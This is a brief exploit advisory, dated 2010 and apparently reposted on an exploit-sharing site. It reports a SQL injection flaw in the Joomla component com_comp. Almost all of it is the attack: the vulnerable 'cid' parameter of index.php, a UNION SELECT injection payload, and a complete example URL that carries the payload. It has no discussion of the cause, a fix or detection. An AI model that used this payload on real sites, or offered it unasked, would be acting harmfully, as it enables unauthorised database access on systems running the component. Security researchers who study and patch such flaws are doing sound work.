id: 9648
date: 03/13/2010
title: Joomla Component com_comp SQL Injection Vulnerability
author: DevilZ TM
cves: 

=====================================================
Joomla Component com_comp SQL Injection Vulnerability
=====================================================

[~]#########################################   ExploiT   #############################################[~]
  
[~] Vulnerable File :
  
http://127.0.0.1/index.php?option=com_comp&task=view&cid=[SQL]
  
[~] ExploiT         :
  
-1+UNION+SELECT+1,2--
  
[~] Example         :
  
http://127.0.0.1/index.php?option=com_comp&task=view&cid=-1+UNION+SELECT+1,2--



#  0day.today [2023-03-26]  #